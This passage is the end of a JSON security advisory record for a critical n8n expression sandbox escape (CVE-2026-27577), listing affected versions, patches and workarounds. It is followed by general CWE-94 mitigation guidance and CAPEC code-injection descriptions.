    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.10.0"
            },
            {
              "fixed": "2.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27577"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T22:05:09Z",
    "nvd_published_at": "2026-02-25T23:16:21Z",
    "severity": "CRITICAL"
  },
  "details": "## Impact\nAdditional exploits in the expression evaluation of n8n have been identified and patched following [CVE-2025-68613](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp). \nAn authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n.\n\n## Patches\nThe issues have been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22. Users should upgrade to one of these versions or later to remediate all known vulnerabilities.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Limit workflow creation and editing permissions to fully trusted users only.\n- Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.\n\n### Resources\n- Best practices for [securing n8n](https://docs.n8n.io/hosting/securing/overview/)\n- Initial vulnerability advisory: [CVE-2025-68613](https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp)",
  "id": "GHSA-vpcf-gvg4-6qwr",
  "modified": "2026-02-27T21:51:58Z",
  "published": "2026-02-25T22:05:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-vpcf-gvg4-6qwr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27577"
    },
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/commit/1479aab2d32fe0ee087f82b9038b1035c98be2f6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/commit/9e5212ecbc5d2d4e6f340b636a5e84be6369882e"
    },
    {
      "type": "WEB",
      "url": "https://docs.n8n.io/hosting/securing/overview"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/n8n-io/n8n"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "n8n: Expression Sandbox Escape Leads to RCE"
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.